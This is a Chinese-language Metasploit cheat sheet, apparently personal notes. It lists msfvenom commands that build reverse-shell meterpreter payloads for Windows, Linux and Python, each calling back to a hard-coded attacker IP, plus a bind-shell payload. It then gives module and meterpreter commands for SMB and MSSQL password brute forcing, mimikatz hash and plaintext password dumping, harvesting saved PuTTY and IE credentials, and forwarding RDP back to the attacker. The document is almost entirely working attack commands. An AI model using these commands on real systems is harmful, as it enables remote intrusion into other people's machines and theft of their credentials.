成功生成反弹型payload :
(1)msfvenom -a x86 --platform win -p windows/meterpreter/reverse_tcp LHOST=192.168.1.109 LPORT=5566 -f exe x> /home/niexinming/back.exe
(2)msfvenom -a x86 --platform win -p windows/meterpreter/reverse_tcp LHOST=120.131.70.121 LPORT=7788 -f aspx x> /home/niexinming/back.aspx(3)msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=120.131.70.121 LPORT=7788 -f elf> /home/niexinming/shell.elf
(4)msfvenom -p python/meterpreter/reverse_tcp LHOST=120.131.70.121 LPORT=7788 > /home/niexinming/shell1.py
成功生成监听型payload msfvenom -a x86 --platform win -p windows/meterpreter/bind_tcp LPORT=5566 -f exe x> /home/niexinming/bind.exe
http://wooyun.org/bugs/wooyun-2010-0135828
http://www.2cto.com/Article/201211/165910.html
https://www.91ri.org/8476.html
https://www.91ri.org/5462.html
生成的payload http://netsec.ws/?p=331
powershell https://www.trustedsec.com/june-2015/interactive-powershell-sessions-within-meterpreter/
meterpreter加载mimikatz 抓HASH 抓明文密码 http://qqhack8.blog.163.com/blog/static/114147985201473111222189/
连接数据库:http://blog.csdn.net/hope_smile/article/details/43932975
本地监听,反弹后的控制端:use exploit/multi/handler
扫描端口:use auxiliary/scanner/portscan/tcp
扫描smb 判断主机:use auxiliary/scanner/smb/smb_version
(重要)爆破smb密码:use auxiliary/scanner/smb/smb_login
判断存活主机:meterpreter > run arp_scanner -r
meterpreter > load mimikatz //加载法国神器
meterpreter > run getgui -f 12345 -e //反弹远程桌面(把远程的3389端口反弹到本地的12345来,然后在本地直接 rdesktop 127.0.0.1:12345)
寻找局域网里面匿名ftp auxiliary/scanner/ftp/anonymous
寻找putty保存的密码meterpreter > run enum_putty
寻找ie保存的密码meterpreter > run post/windows/gather/enum_ie
windows的口令:meterpreter > run windows/gather/smart_hashdump
得到本地路由:meterpreter > run get_local_subnets
暴力破解:use auxiliary/scanner/mssql/mssql_login
mssql执行cmd:use auxiliary/admin/mssql/mssql_exec